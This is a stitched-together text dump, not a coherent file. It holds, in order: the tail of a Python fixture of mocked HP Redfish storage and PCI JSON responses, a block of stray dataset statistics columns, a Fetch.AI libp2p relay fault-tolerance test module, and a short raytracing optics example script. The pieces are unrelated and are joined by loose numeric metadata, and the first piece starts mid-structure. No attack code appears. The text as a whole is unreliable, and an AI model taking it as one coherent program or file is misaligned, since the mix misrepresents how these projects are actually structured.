"BusNumber": 132,
"ClassCode": 6,
"DeviceID": 34631,
"DeviceInstance": 2,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "PCIe Controller",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.2.1",
"SubclassCode": 4,
"SubsystemDeviceID": 34631,
"SubsystemVendorID": 4277,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x1)/Pci(0x3,0x0)/Pci(0x0,0x0)",
"VendorID": 4277,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
},
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 5,
"ClassCode": 3,
"DeviceID": 26528,
"DeviceInstance": 3,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "HAWAII XTGL",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.3.1",
"SubclassCode": 128,
"SubsystemDeviceID": 821,
"SubsystemVendorID": 4098,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Pci(0x8,0x0)/Pci(0x0,0x0)",
"VendorID": 4098,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
}
]
}
"""
STORAGE_SETTINGS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/",
"@odata.type": "#HpSmartStorage.HpSmartStorage",
"Description": "HP Smart Storage",
"Id": "1",
"Links": {
"ArrayControllers": {
"@odata.id": "/redfish/v1/Systems/1\
/SmartStorage/ArrayControllers/"
},
"HostBusAdapters": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage\
/HostBusAdapters/"
}
},
"Name": "HpSmartStorage",
"Status": {
"Health": "OK"
},
"Type": "HpSmartStorage.1.0.0",
"links": {
"ArrayControllers": {
"href": "/rest/v1/Systems/1/SmartStorage\
/ArrayControllers"
},
"HostBusAdapters": {
"href": "/rest/v1/Systems/1/SmartStorage\
/HostBusAdapters"
},
"self": {
"href": "/rest/v1/Systems/1/SmartStorage"
}
}
}
"""
ARRAY_SETTINGS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/",
"@odata.type": "#HpSmartStorageArrayControllerCollection.\
1.0.0.HpSmartStorageArrayControllerCollection",
"Description": "HP Smart Storage Array Controllers View",
"MemberType": "HpSmartStorageArrayController.1",
"Members": [{
"@odata.id": "/redfish/v1/Systems/1/SmartStorage\
/ArrayControllers/0/"
}],
"Members@odata.count": 1,
"Name": "HpSmartStorageArrayControllers",
"Total": 1,
"Type": "Collection.0.9.5",
"links": {
"Member": [{
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0"
}],
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers"
}
}
}
"""
ARRAY_MEM_SETTINGS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/0/",
"@odata.type": "#HpSmartStorageArrayController.\
HpSmartStorageArrayController",
"AdapterType": "SmartArray",
"BackupPowerSourceStatus": "Present",
"CacheMemorySizeMiB": 1024,
"CurrentOperatingMode": "RAID",
"Description": "HP Smart Storage Array Controller View",
"FirmwareVersion": {
"Current": {
"VersionString": "2.49"
}
},
"HardwareRevision": "B",
"Id": "0",
"Links": {
"LogicalDrives": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/LogicalDrives/"
},
"PhysicalDrives": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives/"
},
"StorageEnclosures": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/StorageEnclosures/"
}
},
"Location": "Slot 0",
"LocationFormat": "PCISlot",
"Model": "HP Smart Array P244br Controller",
"Name": "HpSmartStorageArrayController",
"SerialNumber": "PDZVU0FLM7I03I",
"Status": {
"Health": "OK",
"State": "Enabled"
},
"Type": "HpSmartStorageArrayController.1.0.0",
"links": {
"LogicalDrives": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers\
/0/LogicalDrives"
},
"PhysicalDrives": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/\
0/DiskDrives"
},
"StorageEnclosures": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/\
0/StorageEnclosures"
},
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0"
}
}
}
"""
DISK_COLLECTION = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers/Members/2/DiskDrives",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers\
/2/DiskDrives/",
"@odata.type": "\
#HpSmartStorageDiskDriveCollection.HpSmartStorageDiskDriveCollection",
"Description": "HP Smart Storage Disk Drives View",
"MemberType": "HpSmartStorageDiskDrive.1",
"Members": [{
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives/0/"
}],
"Members@odata.count": 1,
"Name": "HpSmartStorageDiskDrives",
"Total": 1,
"Type": "Collection.1.0.0",
"links": {
"Member": [{
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives/0"
}],
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives"
}
}
}
"""
DISK_DETAILS_LIST = """
[{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers/Members/0/DiskDrives/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers\
/0/DiskDrives/0/",
"@odata.type": "#HpSmartStorageDiskDrive.HpSmartStorageDiskDrive",
"CapacityMiB": 572325,
"CurrentTemperatureCelsius": 25,
"Description": "HP Smart Storage Disk Drive View",
"EncryptedDrive": "False",
"FirmwareVersion": {
"Current": {
"VersionString": "HPDC"
}
},
"Id": "0",
"InterfaceType": "SAS",
"Location": "1I:1:1",
"LocationFormat": "ControllerPort:Box:Bay",
"MaximumTemperatureCelsius": 34,
"MediaType": "HDD",
"Model": "EG0600FBVFP",
"Name": "HpSmartStorageDiskDrive",
"RotationalSpeedRpm": 10000,
"SerialNumber": "KWK1JS2X",
"Status": {
"Health": "OK",
"State": "Enabled"
},
"Type": "HpSmartStorageDiskDrive.1.0.0",
"links": {
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers\
/0/DiskDrives/0"
}
}
}]
"""
LOGICAL_COLLECTION = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/SmartStorage/\
ArrayControllers/Members/0/LogicalDrives",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/\
0/LogicalDrives/",
"@odata.type": "\
#HpSmartStorageLogicalDriveCollection.HpSmartStorageLogicalDriveCollection",
"Description": "HP Smart Storage Logical Drives View",
"MemberType": "HpSmartStorageLogicalDrive.1",
"Members": [{
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers\
/0/LogicalDrives/0/"
}],
"Members@odata.count": 1,
"Name": "HpSmartStorageLogicalDrives",
"Total": 1,
"Type": "Collection.1.0.0",
"links": {
"Member": [{
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/\
0/LogicalDrives/1"
}],
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0\
/LogicalDrives"
}
}
}
"""
LOGICAL_DETAILS = """
[{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/SmartStorage/\
ArrayControllers/Members/0/LogicalDrives/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/0/\
LogicalDrives/1/",
"@odata.type": "\
#HpSmartStorageLogicalDrive.1.1.0.HpSmartStorageLogicalDrive",
"CapacityMiB": 286070,
"Description": "HP Smart Storage Logical Drive View",
"Id": "1",
"LogicalDriveEncryption": false,
"LogicalDriveName": "01908CF2PDNMF0ARH6X0FN6FE9",
"LogicalDriveNumber": 1,
"LogicalDriveType": "Data",
"Name": "HpSmartStorageLogicalDrive",
"Raid": "0",
"Status": {
"Health": "OK",
"State": "Enabled"
},
"StripeSizeBytes": 262144,
"Type": "HpSmartStorageLogicalDrive.1.1.0",
"VolumeUniqueIdentifier": "600508B1001CC8A5FF549462C7B8412A",
"links": {
"DataDrives": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0/\
LogicalDrives/1/DataDrives"
},
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0/\
LogicalDrives/1"
}
}
}]
"""
ARRAY_SETTING_NO_CONTROLLER = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/",
"@odata.type": "#HpSmartStorageArrayControllerCollection.\
1.0.0.HpSmartStorageArrayControllerCollection",
"Description": "HP Smart Storage Array Controllers View",
"MemberType": "HpSmartStorageArrayController.1",
"Members@odata.count": 0,
"Name": "HpSmartStorageArrayControllers",
"Total": 0,
"Type": "Collection.0.9.5",
"links": {
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers"
}
}
}
"""
| 31.680112
| 78
| 0.413307
| 9,065
| 146,869
| 6.673028
| 0.106012
| 0.022747
| 0.028434
| 0.025855
| 0.898183
| 0.882792
| 0.869005
| 0.85821
| 0.843911
| 0.82561
| 0
| 0.058466
| 0.444968
| 146,869
| 4,635
| 79
| 31.686947
| 0.6836
| 0.004514
| 0
| 0.674066
| 0
| 0.008352
| 0.975361
| 0.181428
| 0
| 0
| 0.010391
| 0
| 0
| 1
| 0
| false
| 0.003736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81b0ad47d38703e2c2e4a33aef3e467eedb19a4b
| 20,402
|
py
|
Python
|
tests/test_packages/test_connections/test_p2p_libp2p/test_fault_tolerance.py
|
devjsc/agents-aea
|
872f7b76cbcd33b6c809905c68681790bb93ff2f
|
[
"Apache-2.0"
] | 1
|
2021-04-08T17:19:42.000Z
|
2021-04-08T17:19:42.000Z
|
tests/test_packages/test_connections/test_p2p_libp2p/test_fault_tolerance.py
|
devjsc/agents-aea
|
872f7b76cbcd33b6c809905c68681790bb93ff2f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_packages/test_connections/test_p2p_libp2p/test_fault_tolerance.py
|
devjsc/agents-aea
|
872f7b76cbcd33b6c809905c68681790bb93ff2f
|
[
"Apache-2.0"
] | 1
|
2021-08-05T08:54:25.000Z
|
2021-08-05T08:54:25.000Z
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This test module contains resilience and fault tolerance tests for P2PLibp2p connection."""
import os
import shutil
import tempfile
import time
import pytest
from aea.configurations.constants import DEFAULT_LEDGER
from aea.crypto.registries import make_crypto
from aea.mail.base import Envelope
from aea.multiplexer import Multiplexer
from packages.fetchai.connections.p2p_libp2p.check_dependencies import build_node
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.default.serialization import DefaultSerializer
from tests.common.utils import wait_for_condition
from tests.conftest import (
MAX_FLAKY_RERUNS_INTEGRATION,
_make_libp2p_connection,
libp2p_log_on_failure,
libp2p_log_on_failure_all,
)
DEFAULT_PORT = 10234
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS_INTEGRATION)
class BaseTestLibp2pRelay:
"""Base test class for libp2p connection relay."""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
self.cwd = os.getcwd()
self.t = tempfile.mkdtemp()
os.chdir(self.t)
build_node(self.t)
self.log_files = []
self.multiplexers = []
def change_state_and_wait(
self,
multiplexer: Multiplexer,
expected_is_connected: bool = False,
timeout: int = 10,
) -> None:
"""
Change state of a multiplexer (either connect or disconnect) and wait.
:param multiplexer: the multiplexer to connect/disconnect.
:param expected_is_connected: whether it should be connected or disconnected.
:param timeout: the maximum number seconds to wait.
:return: None
"""
wait_for_condition(
lambda: multiplexer.is_connected == expected_is_connected, timeout=timeout
)
def teardown(self):
"""Tear down the test"""
for mux in self.multiplexers:
mux.disconnect()
os.chdir(self.cwd)
try:
shutil.rmtree(self.t)
except (OSError, IOError):
pass
@libp2p_log_on_failure_all
class TestLibp2pConnectionRelayNodeRestartIncomingEnvelopes(BaseTestLibp2pRelay):
"""Test that connection will reliably receive envelopes after its relay node restarted"""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
super().setup()
temp_dir_gen = os.path.join(self.t, "temp_dir_gen")
os.mkdir(temp_dir_gen)
self.genesis = _make_libp2p_connection(
data_dir=temp_dir_gen, port=DEFAULT_PORT + 1, build_directory=self.t
)
self.multiplexer_genesis = Multiplexer(
[self.genesis], protocols=[DefaultMessage]
)
self.multiplexer_genesis.connect()
self.log_files.append(self.genesis.node.log_file)
self.multiplexers.append(self.multiplexer_genesis)
genesis_peer = self.genesis.node.multiaddrs[0]
file = "node_key"
make_crypto(DEFAULT_LEDGER).dump(file)
self.relay_key_path = file
temp_dir_rel = os.path.join(self.t, "temp_dir_rel")
os.mkdir(temp_dir_rel)
self.relay = _make_libp2p_connection(
data_dir=temp_dir_rel,
port=DEFAULT_PORT + 2,
entry_peers=[genesis_peer],
node_key_file=self.relay_key_path,
build_directory=self.t,
)
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.log_files.append(self.relay.node.log_file)
self.multiplexers.append(self.multiplexer_relay)
relay_peer = self.relay.node.multiaddrs[0]
temp_dir_1 = os.path.join(self.t, "temp_dir_1")
os.mkdir(temp_dir_1)
self.connection = _make_libp2p_connection(
data_dir=temp_dir_1,
port=DEFAULT_PORT + 3,
relay=False,
entry_peers=[relay_peer],
build_directory=self.t,
)
self.multiplexer = Multiplexer([self.connection], protocols=[DefaultMessage])
self.multiplexer.connect()
self.log_files.append(self.connection.node.log_file)
self.multiplexers.append(self.multiplexer)
temp_dir_2 = os.path.join(self.t, "temp_dir_2")
os.mkdir(temp_dir_2)
self.connection2 = _make_libp2p_connection(
data_dir=temp_dir_2,
port=DEFAULT_PORT + 4,
relay=False,
entry_peers=[relay_peer],
build_directory=self.t,
)
self.multiplexer2 = Multiplexer([self.connection2], protocols=[DefaultMessage])
self.multiplexer2.connect()
self.log_files.append(self.connection2.node.log_file)
self.multiplexers.append(self.multiplexer2)
def test_connection_is_established(self):
"""Test connection established."""
assert self.relay.is_connected is True
assert self.connection.is_connected is True
assert self.connection2.is_connected is True
def test_envelope_routed_from_peer_after_relay_restart(self):
"""Test envelope routed from third peer after relay restart."""
addr_1 = self.genesis.address
addr_2 = self.connection.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer_genesis.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer_relay.disconnect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=False)
# currently, multiplexer cannot be restarted
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=True)
self.multiplexers.append(self.multiplexer_relay)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterRestart",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer_genesis.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
def test_envelope_routed_from_client_after_relay_restart(self):
"""Test envelope routed from third relay client after relay restart."""
addr_1 = self.connection.address
addr_2 = self.connection2.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_1,
sender=addr_2,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer2.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer_relay.disconnect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=False)
# currently, multiplexer cannot be restarted
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=True)
self.multiplexers.append(self.multiplexer_relay)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterRestart",
)
envelope = Envelope(
to=addr_1,
sender=addr_2,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
time.sleep(5)
self.multiplexer2.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
@libp2p_log_on_failure_all
class TestLibp2pConnectionRelayNodeRestartOutgoingEnvelopes(BaseTestLibp2pRelay):
"""Test that connection will reliably route envelope to destination in case of relay node restart within timeout"""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
super().setup()
temp_dir_gen = os.path.join(self.t, "temp_dir_gen")
os.mkdir(temp_dir_gen)
self.genesis = _make_libp2p_connection(
data_dir=temp_dir_gen, port=DEFAULT_PORT + 1, build_directory=self.t
)
self.multiplexer_genesis = Multiplexer(
[self.genesis], protocols=[DefaultMessage]
)
self.multiplexer_genesis.connect()
self.log_files.append(self.genesis.node.log_file)
self.multiplexers.append(self.multiplexer_genesis)
genesis_peer = self.genesis.node.multiaddrs[0]
file = "node_key"
make_crypto(DEFAULT_LEDGER).dump(file)
self.relay_key_path = file
temp_dir_rel = os.path.join(self.t, "temp_dir_rel")
os.mkdir(temp_dir_rel)
self.relay = _make_libp2p_connection(
data_dir=temp_dir_rel,
port=DEFAULT_PORT + 2,
entry_peers=[genesis_peer],
node_key_file=self.relay_key_path,
build_directory=self.t,
)
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.log_files.append(self.relay.node.log_file)
self.multiplexers.append(self.multiplexer_relay)
relay_peer = self.relay.node.multiaddrs[0]
temp_dir_1 = os.path.join(self.t, "temp_dir_1")
os.mkdir(temp_dir_1)
self.connection = _make_libp2p_connection(
data_dir=temp_dir_1,
port=DEFAULT_PORT + 3,
relay=False,
entry_peers=[relay_peer],
build_directory=self.t,
)
self.multiplexer = Multiplexer([self.connection], protocols=[DefaultMessage])
self.multiplexer.connect()
self.log_files.append(self.connection.node.log_file)
self.multiplexers.append(self.multiplexer)
def test_connection_is_established(self):
"""Test connection established."""
assert self.relay.is_connected is True
assert self.connection.is_connected is True
def test_envelope_routed_after_relay_restart(self):
"""Test envelope routed after relay restart."""
addr_1 = self.connection.address
addr_2 = self.genesis.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer.put(envelope)
delivered_envelope = self.multiplexer_genesis.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer_relay.disconnect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=False)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterRestart",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer.put(envelope)
time.sleep(5)
# currently, multiplexer cannot be restarted
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=True)
self.multiplexers.append(self.multiplexer_relay)
delivered_envelope = self.multiplexer_genesis.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
@libp2p_log_on_failure_all
class TestLibp2pConnectionAgentMobility(BaseTestLibp2pRelay):
"""Test that connection will correctly route envelope to destination that changed its peer"""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
super().setup()
temp_dir_gen = os.path.join(self.t, "temp_dir_gen")
os.mkdir(temp_dir_gen)
self.genesis = _make_libp2p_connection(data_dir=temp_dir_gen, port=DEFAULT_PORT)
self.multiplexer_genesis = Multiplexer(
[self.genesis], protocols=[DefaultMessage]
)
self.log_files.append(self.genesis.node.log_file)
self.multiplexer_genesis.connect()
self.multiplexers.append(self.multiplexer_genesis)
genesis_peer = self.genesis.node.multiaddrs[0]
temp_dir_1 = os.path.join(self.t, "temp_dir_1")
os.mkdir(temp_dir_1)
self.connection1 = _make_libp2p_connection(
data_dir=temp_dir_1, port=DEFAULT_PORT + 1, entry_peers=[genesis_peer]
)
self.multiplexer1 = Multiplexer([self.connection1], protocols=[DefaultMessage])
self.log_files.append(self.connection1.node.log_file)
self.multiplexer1.connect()
self.multiplexers.append(self.multiplexer1)
self.connection_key = make_crypto(DEFAULT_LEDGER)
temp_dir_2 = os.path.join(self.t, "temp_dir_2")
os.mkdir(temp_dir_2)
self.connection2 = _make_libp2p_connection(
data_dir=temp_dir_2,
port=DEFAULT_PORT + 2,
entry_peers=[genesis_peer],
agent_key=self.connection_key,
)
self.multiplexer2 = Multiplexer([self.connection2], protocols=[DefaultMessage])
self.log_files.append(self.connection2.node.log_file)
self.multiplexer2.connect()
self.multiplexers.append(self.multiplexer2)
def test_connection_is_established(self):
"""Test connection established."""
assert self.connection1.is_connected is True
assert self.connection2.is_connected is True
def test_envelope_routed_after_peer_changed(self):
"""Test envelope routed after peer changed."""
addr_1 = self.connection1.address
addr_2 = self.connection2.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer1.put(envelope)
delivered_envelope = self.multiplexer2.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer2.disconnect()
self.change_state_and_wait(self.multiplexer2, expected_is_connected=False)
# currently, multiplexer cannot be restarted
self.multiplexer2 = Multiplexer([self.connection2], protocols=[DefaultMessage])
self.multiplexer2.connect()
self.change_state_and_wait(self.multiplexer2, expected_is_connected=True)
self.multiplexers.append(self.multiplexer2)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterChangingPeer",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=msg.protocol_specification_id,
message=msg.encode(),
)
self.multiplexer1.put(envelope)
delivered_envelope = self.multiplexer2.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
| 37.027223
| 119
| 0.660082
| 2,216
| 20,402
| 5.830776
| 0.112365
| 0.058045
| 0.071202
| 0.038387
| 0.817197
| 0.796455
| 0.77881
| 0.771922
| 0.762867
| 0.747852
| 0
| 0.011807
| 0.248603
| 20,402
| 550
| 120
| 37.094545
| 0.83105
| 0.097981
| 0
| 0.742317
| 0
| 0
| 0.012006
| 0.001206
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.030733
| false
| 0.002364
| 0.033097
| 0
| 0.073286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81cf2bb4801bb9bbba82503054f26f28d02a2b6c
| 1,872
|
py
|
Python
|
examples/invariant.py
|
gregsadetsky/RayTracing
|
3d11ed91014a47bddc797495ca2af059005e810d
|
[
"MIT"
] | 1
|
2021-04-20T09:38:05.000Z
|
2021-04-20T09:38:05.000Z
|
examples/invariant.py
|
gregsadetsky/RayTracing
|
3d11ed91014a47bddc797495ca2af059005e810d
|
[
"MIT"
] | null | null | null |
examples/invariant.py
|
gregsadetsky/RayTracing
|
3d11ed91014a47bddc797495ca2af059005e810d
|
[
"MIT"
] | 2
|
2021-04-20T09:38:06.000Z
|
2022-02-20T23:45:18.000Z
|
import envexamples
from raytracing import *
path = ImagingPath()
path.name = "4f system, 1 cm object, small lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=2.5))
path.append(Space(d=10))
path.display()
#path.saveFigure('object-smallLenses.png')
path = ImagingPath()
path.name = "4f system, 1 cm object, small and large lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=5))
path.append(Space(d=10))
path.display()
#path.saveFigure('object-smallLargeLenses.png')
path = ImagingPath()
path.name = "4f system, calculated field of view, small lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=2.5))
path.append(Space(d=10))
path.display(onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
#path.saveFigure('fov-smallLenses.png', onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
path = ImagingPath()
path.name = "4f system, improved field of view, small and large lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=5.0))
path.append(Space(d=10))
path.display(onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
#path.saveFigure('fov-smallLargeLenses.png', onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
path = ImagingPath()
path.name = "4f systeme, no change in field of view with large first lens"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=5.0))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=5.0))
path.append(Space(d=10))
path.display(onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
#path.saveFigure('fov-largeLenses.png', onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
| 35.320755
| 106
| 0.769765
| 284
| 1,872
| 5.073944
| 0.169014
| 0.173491
| 0.156142
| 0.166551
| 0.869535
| 0.828591
| 0.824427
| 0.797363
| 0.797363
| 0.797363
